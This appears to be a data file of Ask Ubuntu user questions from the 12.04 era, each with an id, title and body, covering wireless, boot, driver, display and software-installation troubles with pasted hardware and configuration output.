180113	computer will no longer load 12.04	my computer asus m5a99x motherboard , 8gb ram , seagate hard drive , asus geforce video card . i had 12.04 lts 64bit loaded . now when i boot , it will go to the grub screen , and then reboot , return to the grub screen and lock up . with a live dvd , it will show the pick language screen and lock up . any ideas ? it had been operating fine .
180114	assigning drive letter for cd-drive	i recently bought a cd which needs to run an installation file to run the program . but the anti-piracy system in the cd detects the disc as a virtual or counterfiet disc because ubuntu does not assign an actual drive letter to the cd-drive . is there a way to force ubuntu to assign a drive letter or is there anyother way to work around this problem .
180121	how do i give a user access to a folder of mine ?	so far i 've set up an ssh server and added a user account using the gnome `` add user '' dialog . now login and sftp work , but i 'd like to give this user read-only access to one of the folders in my /home directory . i should also note that i have an encrypted /home directory . i tried setting up a symbolic link to the folder , and then changing the permissions on the link , but that did n't seem to work . when i try to cd into that folder as that user , i get : could n't canonicalise : permission denied .
180126	wireless network found , ca n't connect , repeated requests for authentication	after trawling through the internet , on forums , support websites , and through dozens upon dozens of answered questions on this site , i 've not found a solution to what seems like a fairly regular problem ... i can not connect to a wireless network , and am continually asked for the network password . i have tried countless suggested solutions on the different locations i 've already referred to . none of them have worked . details of my experience are as follows : i have just recently installed ubuntu 12.04.1 ( 32-bit ) . ubuntu installed on my system seemingly fine , and i even formatted my hard drive during the process . it 's as if it were a new desktop computer . during the installation i was asked to connect to a wireless network . i have a usb wireless card connected which i have used to connect desktop pc 's , laptops , and a wii to the internet from approximately the same area of the house ( thus the same distance from the wireless router ) . i chose my network , entered the correct password for it ( i double checked ; it 's definitely the right password ) and proceeded with the installation . several times before the installation was complete , i was asked to authenticate the connection , and this seemed to do nothing each time . on the repeated screens the password was already entered in the appropriate box . when ubuntu booted up the first thing i was faced with ( other than something about language settings , or something ) was another request for authentication . again , the password was already there , so i clicked connect . it did not connect . instead , i was once again faced with repeated requests every few minutes . i went onto my laptop , which is connected to this network , checked the details of the network , and entered them manually into my ubuntu pc ( including the ipv4 and ipv6 information ) but this did n't work either , so i set it back to finding the settings automatically . note , also , that the `` connect automatically '' and `` available to all users '' boxes are checked , and have been unchecked & rechecked countless times . i have also tried having my user account connect automatically , and to need a password entered at the welcome screen . whilst i 've been writing this , it has gone through a spat of connecting successfully to the network for less than a minute , before coming offline again , only to repeat the process . but it has now returned to prompting me for a password every couple of minutes . this computer has already run on the fedora os , and had no trouble connecting to , and maintaining a connection . i also have a laptop running windows 7 less than a metre away from this desktop pc , which is connected and has no trouble maintaining a connection at 50 % -100 % strength ( fluctuating ) . therefore : - i know it 's not the wireless card - i know it 's not the pc itself - i know it 's not the access point - i know it 's not the location of my pc or wireless card - it is solely because of ubuntu everything else has worked fine , but the moment ubuntu was introduced into the equation , it has gone completely wrong . honestly ; i prefer ubuntu as an os to fedora , but if i ca n't solve the problem it 'll be straight back to fedora that i 'll have to go . can anyone help me at all ?
180128	how can i recursively set pemission to all sub directories of a directory specified ?	with this command sudo chmod 777 /var/www/ i get 777 on www but not under www/subdir1/subdir2 how can i set all subdirectories recursively to 777 with one command ?
180132	wireless stop working after kernel updates 3.2.0-29-generic	two or three days back , i have updated to kernel 3.2.0-29-generic from kernel 3.2.0-27-generic . now my wireless is not working since then ... before it was working properly . it keeps asking me the password . sometime it connects but the speed the is very very slow ... like no more than 2 to 4kb . lspci 00:00.0 host bridge : intel corporation 4 series chipset dram controller ( rev 03 ) 00:01.0 pci bridge : intel corporation 4 series chipset pci express root port ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation n10/ich7 family sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) 01:00.0 vga compatible controller : nvidia corporation g96 [ geforce 9400 gt ] ( rev a1 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) 04:01.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8185 ieee 802.11a/b/g wireless lan controller ( rev 20 ) lsmod module size used by snd_seq_dummy 12798 0 pci_stub 12622 1 vboxpci 23200 0 vboxnetadp 25670 0 vboxnetflt 23441 0 vboxdrv 282587 3 vboxpci , vboxnetadp , vboxnetflt rfcomm 47604 0 bnep 18281 2 vesafb 13844 1 bluetooth 180104 10 rfcomm , bnep arc4 12529 2 rtl8180 40710 0 mac80211 506816 1 rtl8180 eeprom_93cx6 12725 1 rtl8180 snd_hda_codec_realtek 224066 1 snd_hda_intel 33773 4 snd_hda_codec 127706 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 2 snd_hda_intel , snd_hda_codec cfg80211 205544 2 rtl8180 , mac80211 psmouse 87692 0 nvidia 12336440 41 snd_seq_midi 13324 0 ppdev 17113 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi w83627ehf 38805 0 hwmon_vid 12827 1 w83627ehf snd_seq 61896 3 snd_seq_dummy , snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 4 snd_seq_dummy , snd_seq_midi , snd_rawmidi , snd_seq serio_raw 13211 0 parport_pc 32866 1 snd 78855 17 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device video 19596 0 mac_hid 13253 0 coretemp 13525 0 soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm lp 17799 0 parport 46562 3 ppdev , parport_pc , lp r8169 62099 0 lshw -c network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 03 serial : 00:27:0e:0e:8c:2b size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168d-1.fw ip=192.168.0.250 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport : d000 ( size=256 ) memory : e3214000-e3214fff memory : e3210000-e3213fff memory : e3200000-e320ffff *-network description : wireless interface product : rtl-8185 ieee 802.11a/b/g wireless lan controller vendor : realtek semiconductor co. , ltd. physical id : 1 bus info : pci @ 0000:04:01.0 logical name : wlan0 version : 20 serial : d8:5d:4c : ff:3e : ef width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8180 driverversion=3.2.0-29-generic firmware=n/a ip=192.168.0.251 latency=32 link=yes maxlatency=64 mingnt=32 multicast=yes wireless=ieee 802.11bg resources : irq:16 ioport : c000 ( size=256 ) memory : e3100000-e31001ff update i have auto login . when i logout & login again , it connects & works properly .
180140	how do i install from a live usb ?	i remember doing this from a while ago but i had to uninstall ubuntu for ... . capacity reasons . now , could someone guide me ? i 'm using a 64-bit windows 7 intel core i5 and i want to install 12.04 lts . also if anyone suggests i modify my bios settings , help me with this too .
180142	how do i make sublime text 2 not open previous tabs when i launch it ?	everytime i open sublime , these tabs automatically opens . how do i fix this . i am unable to find any setting for this .
180143	how to reset fonts	is there any way to reset fonts ? my recent customization made the desktop ugly , now the fonts are not smooth and some are very small.i used ubuntu tweak tool to reset fonts . but it did n't work as thought.is there a configuration file to edit or delete to reset this ?
180149	external usb drive	i have a server that i hooked up an external usb drive . it was formatted in windows and has files on it already . i 'm new to ubuntu so please be patient ... i have two questions : will ubuntu see the drive since it was formatted in windows ? how do i mount this drive or rather , how do i know it 's seen by ubuntu ? thanks ! i did fdisk -l and this is what i have but i do n't see it . it 's a 1tb drive : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001eb47 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 625141759 312320001 5 extended /dev/sda5 501760 625141759 312320000 8e linux lvm disk /dev/sdc : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdc does n't contain a valid partition table disk /dev/sdb : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table disk /dev/mapper/ubuntu-root : 316.6 gb , 316577677312 bytes 255 heads , 63 sectors/track , 38488 cylinders , total 618315776 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-root does n't contain a valid partition table disk /dev/mapper/ubuntu-swap_1 : 3217 mb , 3217031168 bytes 255 heads , 63 sectors/track , 391 cylinders , total 6283264 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 this is an external usb hard drive not a thumb drive : )
180155	ubiquity installer hangs after `` prepearing to install ... ''	i have tried this on a brand new latest xubuntu disk , and then on an old regular ubuntu 10.10 disk . both result in the same thing ( and i would prefer to use xubuntu , if possible . ) i have tried running the installer straight from the disk , or inside the `` try ubuntu '' live session . both result in the installer either hanging or otherwise refusing to continue past `` preparing to install `` . i ran ubiquity with -- debug and have the results posted here . is ubiquity just taking an abnormally long time to proceed ? is something wrong ? i 'm attempting to install on a freshly formatted 80 gig hard drive ( in the ext4 format ) . if more information is needed , i can provide .
180156	sony vaio vpceh18fg backlight problem	i have installed ubuntu 12.04 on sony vaio vpceh18fg but the screen brightness does not change with fn+f5/f6 keys and /etc/x11/xorg.conf file is also not found . how can i solve this problem ?
180158	how does one connect to a gtk signal with a dash inside it while using quickly ?	i 'm currently writing an app with quickly where i want to connect to the `` preedit-changed '' signal of an entry box . while with signals like clicked where you can write a function on_button1_clicked , you ca n't just do that with preedit-changed because of the dash . will i have to connect the signal manually , or is there an alternate character to replace the dash with ?
180159	how to delete windows , after installing ubuntu via windows installer ?	how can io delete windows , after installing ubuntu via the windows installer ?
180163	uninstalling wubi after windows restore	i restored my windows computer with wubi on it , but when i booted it up for the 1st time , ubuntu is still there to choose during boot . help ?
180165	system hangs after resuming from suspend	recently i am encountering this problem . the system hangs after resuming from suspend . the system works again only after force restart . has any one encountered this before . pls point out a solution .
180168	can i get online support from canonical for improving performance ?	i am a real techno-tard . i need help optimizing my pc performance . does canonical offer any online support ( such as online chat ) to help people like me ? i try to understand the posts but the language is just too technical for me to understand what to do to help myself .
180169	lan port suddenly stopped working	i have ubuntu 12.04 . my lan port was working well and good till yesterday when i shut down my system . when i wanted to use my laptop today the wired network was not being detected . when the port works the blue light glows as an indicator but right now just an orange light indicating failure is glowing . this light keeps glowing and tries to connect even when i have removed my lan cable . the output of sudo rfkill list all shows nothing is blocked . also even when lan used to work in ubuntu it did not work in windows 7 .
180178	insert output of a system command at the current location in vim	in vim , when i use : r ! ls somefilename it inserts output of that command on a new line below the current line . if i do let @ a = system ( `` ls '' ) and later '' ap it still inserts the output on a new line below the current line . is there a way to make vim insert output at the current location ?
180182	how do i disable default alt+key menu bindings for all applications ?	i 'm running ubuntu 12.04 as a virtualbox guest with a pc keyboard , and whenever i press alt , the menus for the currently focused application appear . while holding alt , if i press other keys , sometimes the menus open . i never want this . there are no cases when i ever activate menu items from the keyboard . is there a way to permanently and completely turn this off , so that no menu can ever appear or open in response to any key press ? it seems like this question must have been asked a million times , but i have searched and searched and ca n't seem to find any answer . i have already turned off the dashboard , but now i need to unplug any and all menus from my alt key , so that i may use it .
180187	lexmark pro205 printer	i 'm trying to setup up my printer but when i search for the make and model for my lemark pro205 it 's not showing up . i tried to do it from the terminal but no luck either . can you please assist me ?
180192	why did my usb drive suddenly stop being detected ?	i wanted to format my usb , so i opened disk-utility to format . but the formatting process was n't complete and gave me some error . now my usb is n't detected ; please help . please find the screen shot from dmesg : - i upgraded to 12.04.1 yesterday , could that be a cause of the problem ?
180195	how to pinch zoom in 12.04 using ( magic ) trackpad	i use the magic trackpad on my desktop , and my laptop has a synaptic trackpad . both machines run on xubuntu 12.04 , and vertical/horizontal two-fingers scrolling work out of box , but i can not pinch zoom on either machine . on the other hand , i was able to pinch zoom using magic trackpad on another laptop running 11.04 ( using ginn , following the recipe here ) . any advice on how to restore pinch-zoom on the 12.04 machines will be appreciated .
180201	12.04 wi-fi not working correctly with intel pro/wireless 3945abg	this is a very strange problem . the only time the wi-fi works is when i have the wired connection connected . i have a dell 6400/e1505 with the broadcom bcm 4401-b0 internal nic , and the intel pro/wireless 3945abg wi-fi adapter . i was on 10.0.4 lts before , and i remember having to screw around to get the wi-fi to work , but that was years ago , and now it 's acting even stranger than it did back then . if i boot up with the wire connected , the wi-fi starts up . if i boot up without the wire connected , the wi-fi wo n't start at all . if after booting with the wire connected , and the wi-fi starts up , i then disable the wireless , the wired connection works fine . without the wire connected , dmesg shows the iwl3945 driver loading and starting with no errors , and the wireless adapter activated . running rfkill list shows no blocks , but there is no connection to my wi-fi . help ! i am more confused than a chameleon in a bag of skittles .
180202	how can i set xdotool and gedit to open a document and save it twice ?	i need assistance in creating a script that does the following : open gedit open a document with gedit save the document twice close gedit i was wondering how can i make it happen with gedit and xdotool , as xdotool can simulate the key combination to save a document ctrl+s
180207	reading source of strlen.c	i am trying to download the source package including strlen.c , which one should i be getting , how ? i have tried looking at the different glibc/eglibc/ ... variants but got confused as to which one to really get . i am a beginner with apt-cache/apt-get/aptitude/dpkg/etc .
180212	correcting boot problem : mount of ntfs drives went wrong	after my upgrade to 12.04 , whenever ubuntu tried to boot up it prompted an error indicating that it ca n't mount ( ntfs ) drives and i had to press s twice , once for each drive , to get to the login screen . now that i have disabled the auto mounting of drives , i guess i 've made a mistake and ubuntu no longer starts . i tried recovery modes ( although i do n't exactly know how to handle them ) , and then i see only a line which says mounting failed and permission was denied . it does n't move past this . how can i get ubuntu to boot again ?
180213	ubuntu crashed while updating	i am using ubuntu for 4 years . now i have loaded 64 bit version on my home . while upgrading to 12.4 it was interrupted for some reasons and not full upgrade down loaded . i started ubuntu on some next 2 days after it was working fine then when connected to internet i saw that 1120 updates are waiting . i started updating when all updates downloaded and it started processing the updates it stopped in between and ubuntu in now not opening . what should i do ? i have windows as well as ubuntu on same hard-disk on my computer . whether any remedy or i have to fresh load ubuntu ?
180214	smplayer and gnome player ( mplayer in fact ) can not play ( crash imediatly ) in lubuntu . what can i do ?	i have just reinstalled my lubuntu os . i have installed lubuntu and ubuntu-restricted extras but can not play video in smplayer or gnome player . log shows something like : /usr/bin/mplayer -noquiet -nofs -nomouseinput -sub-fuzziness 1 -identify -slave -vo xv , -nokeepaspect -framedrop -nodr -double -input conf=/usr/share/smplayer/input.conf -stop-xscreensaver -wid 50331689 -monitorpixelaspect 1 -ass -embeddedfonts -ass-line-spacing 0 -ass-font-scale 1 -ass-styles /home/cprq/.config/smplayer/styles.ass -fontconfig -font arial -subfont-autoscale 0 -subfont-osd-scale 20 -subfont-text-scale 20 -subcp iso-8859-1 -subpos 100 -nocache -osdlevel 0 -vf-add screenshot -slices -channels 2 -af equalizer=0:0:0:0:0:0:0:0:0:0 -softvol -softvol-max 110
180215	how can i search for files in all sub-directories using the shell and then copy those files ?	how can i find just the *.mp3 files with a recursive command like ls -r *.mp3 in a directory that contains several sub-directories and at the end copy these files in a directory that i choose . thanks for your support .
180218	why does integrity check fail for the 12.04.1 alternate iso ?	i have followed various recommendations from the ubuntu documentation to create a bootable ubuntu usb flash drive using the 12.04.1 alternate install iso-file for 64-bit pc . but the integrity test of the usb stick has failed and i do not see why . these are the steps i have made : download of the 12.04.1 alternate install iso-file for 64-bit pc ( ubuntu-12.04.1-alternate-amd64.iso ) from http : //releases.ubuntu.com/12.04.1/ , as well as the md5 , sha-1 and sha-256 hash files and related pgp signatures verification of the data integrity of the iso-file using the md5 , sha-1 and sha-256 hash files , after having verified the hash files using the related pgp signature files ( see e.g . https : //help.ubuntu.com/community/howtosha256sum and https : //help.ubuntu.com/community/verifyisohowto ) creation of a bootable usb stick using ubuntu 's startup disk creator program ( see http : //www.ubuntu.com/download/help/create-a-usb-stick-on-ubuntu ) boot of my computer using the newly made 12.04.1 alternate install on usb stick selection of the option `` check disc for defects '' ( see https : //help.ubuntu.com/community/installation/cdintegritycheck ) steps 1 , 2 , 3 and 4 went without any problem or error messages . however , step 5 ended with an error message entitled `` integrity test failed '' and with the following content : the ./install/netboot/ubuntu-installer/amd64/pxelinux.cfg/default file failed the md5 checksum verification . your cd-rom or this file may have been corrupted . i have experienced the same ( might only be similar since i have no exact notes ) error message in previous attempts using the 12.04 ( i.e . not the maintenance release ) alternate install iso-file . i have in these cases tried to install anyway and have so far not experienced any problems to my knowledge . is failed integrity check described above a serious error ? what is the solution ? or can it be ignored without further problems ?
180219	how do i install powertop 2.1 in 12.04 ?	i have installed powertop from the ubuntu software center and just realized that a new version is available . however this new version is not yet available in the ubuntu software center . how do i then upgrade to the new version ?
180222	macbook pro 6,2 12.04 running hot ? ahci	i 've finally managed to get 12.04 running on my macbook pro with a 240gb ssd , i 've heard that running an ssd in ide on ubuntu can make it run very hot , which i suspsect is what i 'm experiencing . is there any way to enable ahci ?
180227	dell vostro 1510 ca n't connect using wired connection	i recently dual-booted my system with windows 7 and 12.04 . i ca n't access internet through wired connection , in spite of lan cable in the socket . it says network cable unplugged , but i can access internet from windows 7 . during the instillation phase for ubuntu , when it tries to check the network connection , it was giving the same message that network cable is unplugged . previously , i was using 10.04 along with windows xp and it was working fine . here is some information you may find useful . ifconfig -a eth0 link encap : ethernet hwaddr 00:21:70 : e7 : cc:93 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:44 base address:0xa000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1328 errors:0 dropped:0 overruns:0 frame:0 tx packets:1328 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:105328 ( 105.3 kb ) tx bytes:105328 ( 105.3 kb ) wlan0 link encap : ethernet hwaddr 00:24:2b : dc:04 : ed broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) sudo lshw -class network *-network description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:06:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:19 memory : f4000000-f4003fff *-network disabled description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 02 serial : 00:21:70 : e7 : cc:93 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a latency=0 link=no multicast=yes port=mii speed=1gbit/s resources : irq:44 ioport:5000 ( size=256 ) memory : f8610000-f8610fff memory : f8600000- f860ffff memory : f8620000-f862ffff *-network disabled description : wireless interface physical id : 2 logical name : wlan0 serial : 00:24:2b : dc:04 : ed capabilities : ethernet physical wireless configuration : broadcast=yes driver=b43 driverversion=3.2.0-23-generic-pae firmware=n/a link=no multicast=yes wireless=ieee 802.11bg sudo ethtool eth0 settings for eth0 : supported ports : [ tp mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes link partner advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full link partner advertised pause frame use : symmetric receive-only link partner advertised auto-negotiation : yes speed : 1000mb/s duplex : full port : mii phyad : 0 transceiver : internal auto-negotiation : on supports wake-on : pumbg wake-on : pumbg current message level : 0x00000033 ( 51 ) link detected : no
180228	where can i get the hash for 12.04.1 iso ?	where can i get the hash for 12.04.1 iso ? is it the same for 12.04 ? i ca n't find it .
180232	why ubuntu 12.04 is shipped with libre office ?	ubuntu 12.04 is shipped with libre office and before that all versions 10 , 9 , 8 were shipped with open office . if libre office is better than in which situations and circumstances ? why ubuntu has decided to switch from open office to libre ?
180233	gimp 2.8 can not edit pdf file	i have ubuntu 12.04 and gimp2.8 installed . it is working fine , but gimp2.8 can not edit any pdf file ( unknown file type ) . this pdf files can be edited with gimp 2.6 . i have installed 2.8 from the ppa : otto-kesselgulasch
180240	how can i use classic menu in ubuntu 12.04 ?	i recently installed ubuntu 12.04 , and it 's with gnome 3 and does not have classic menu like 10.04 . is there any way to have classic menu in 12.04 and any way to switch back and forth when i like to ?
180244	how do i enter bios	when i press the f2 key i can enter into bios before i change it 's os ( windows 7 ) to ubuntu os in my samsung 530u3c ultrabook , but now i ca n't , it direct to ubuntu os . can anybody help me ? please !
180245	only synchronising certain files	i would like to sync my eclipse workspace on ubuntu one , but this could become very big , with a lot of unnessecary files , how could i get ubuntu one to only sync *.java files in a folder structure ? thanks
180248	how do you run xbmc on nvidia dual screen and stop it from taking over the keyboard and mouse ?	i have set up dual screen under ubuntu 12.04 . i have a geforce 8500 gt and have used the nvidia control panel to set up dual screen in `` separate screen mode '' . here 's the resulting xorg.conf : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ zirconium ) fri mar 30 13:38:49 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` maxdata/belinea b1925s1w '' horizsync 31.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' # horizsync source : builtin , vertrefresh source : builtin identifier `` monitor1 '' vendorname `` unknown '' modelname `` crt-1 '' horizsync 28.0 - 55.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8500 gt '' busid `` pci:1:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8500 gt '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` crt-0 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' # removed option `` metamodes '' `` crt-1 : 1280x768 +0+0 '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` crt-1 : 1360x768_60 +0+0 '' subsection `` display '' depth 24 endsubsection endsection all well and good and i have a nice blank xwindow displayed on my tv ( the 2nd monitor ) . i then fire up xbmc from a terminal on the pc monitor using : display=:0.1 xbmc xbmc fires up quite nicely on the tv however i can no longer use the main pc monitor/mouse/keyboard as xbmc on the tv screen seems to have focus . i was hoping to have xbmc running on the tv and let the kids use the mce remote whilst i get on with my work on the pc monitor . does anyone have any idea how to overcome this ? i 'm presuming there 's some xorg.conf fun and games needed but i 've no idea where to start to be honest .
180252	monitor black after update today 12.04	today after installing all available updates , i restarted my pc and my monitor wo n't display anything . it is strange as i can not even get it to display a bios screen during startup . the pc is however booting up - the media player is picking up mediatomb and streaming perfectly well . i have tried a second monitor , same thing , absolutely no response during any part of boot sequence or thereafter . i have also tried a second cord as well , no difference . i did recently upgrade monitors and when doing so enabled the nvidia driver rather than using the generic one , but have had no problems until this afternoon . i am totally aware that this is a question that lacks a lot of details , but i am fairly new to linux . as the pc is up and running , i am happy to ctrl-alt-t a terminal window and type in any suggestions you folks might have to get the monitor displaying anything .
180253	gimp extended input devices settings problem	i have a trust graphics tablet . today i realized how to make gimp use the tablet 's sensitivity features : by going to edit > preferences > input devices > configure extended input devices , and there change the settings for the tablet . this works fine , until i close gimp and reopen it . then no input device is able to do anything and i need to go through the menus again to enable the tablet . what happens is that there are two entries for extended input devices to the tablet : one for the tablet 's stylus , and one for its mouse ( not my ps/2 moues , but rather a mouse that arrived packed with the tablet and that is used by it ) . whenever i change the settings for the stylus entry , it works , but when i quit gimp and reenter , it somehow transfers the settings i used for the stylus to the second entry : that of the mouse . it 's probably because gimp recognizes the two input devices with the same name ( i can see two `` uc-logic tablet wp8060u '' entries in the settings dialog ) and somehow it attributes the settings i made to the mouse before it does to the stylus . maybe if i change the name of one input device it will work properly ? how do i do that ? and if that does n't work , what else can i try ? edit : after reading a little , i tried tinkering with the options found in /usr/share/x11/xorg.conf.d , but i only managed to make the x server ignore the stylus instance of the tablet and not the mouse instance . i do n't understand how that 's possible , as i went through everything in the driver that activates the tablet and disabled it . any other ideas ?
180254	is there a way to switch to the old netbook interface ?	is there a way to switch to the old netbook remix interface ? the one that was like easy peasy i do n't like the way unity looks like now . thanks .
180258	how to add some margin for icon space in unity bar menu ?	how do you add a little margin for icon space next to menu items in unity bar menu ? i 'm trying to make menu items appear more consistently aligned when there are both menu items with/without icon in the menu . i 'm talking about this i 'm guessing this takes only few lines of changes in unity.css in /gtk-3.0/apps but i 'm not sure what to change there . this is the default ambience theme .
180262	is it worth upgrading ram ?	i 'm thinking about upgrading my ram from 1gb to 2 or 4 gb . i would like to have some idea as to whether buying more ram would be worth the expense . how can i know whether i will see better performance after upgrading ram ?
180270	are discrete graphic cards needed to run unity 3d ?	i was using 10.04 , upgraded to 12.04 15 days before . my system specifications are : 512 mb ram ( 2 slots each of 256 mb 184pin ddr dimm ram ) i686 , amd athlon ( 1150 mhz ) , without graphics card . i am a normal user . i want to upgrade my system ( i do n't want to buy a new one ) to 2 gb ram ( 1+1 gb ) . there is a slot for agp3 graphics card . but is graphic card necessary for ubuntu 12.04 ?
180275	how to install libsane-perl > =0.05 in lubuntu 12.04 ?	after reinstalling my lubuntu 12.04 system i want to get back some programs , amongst which gscan2pdf when i try to install the deb file in gdebi i get this in synaptic i have tried to install that dependency but it is an older version how to install the newest version ?
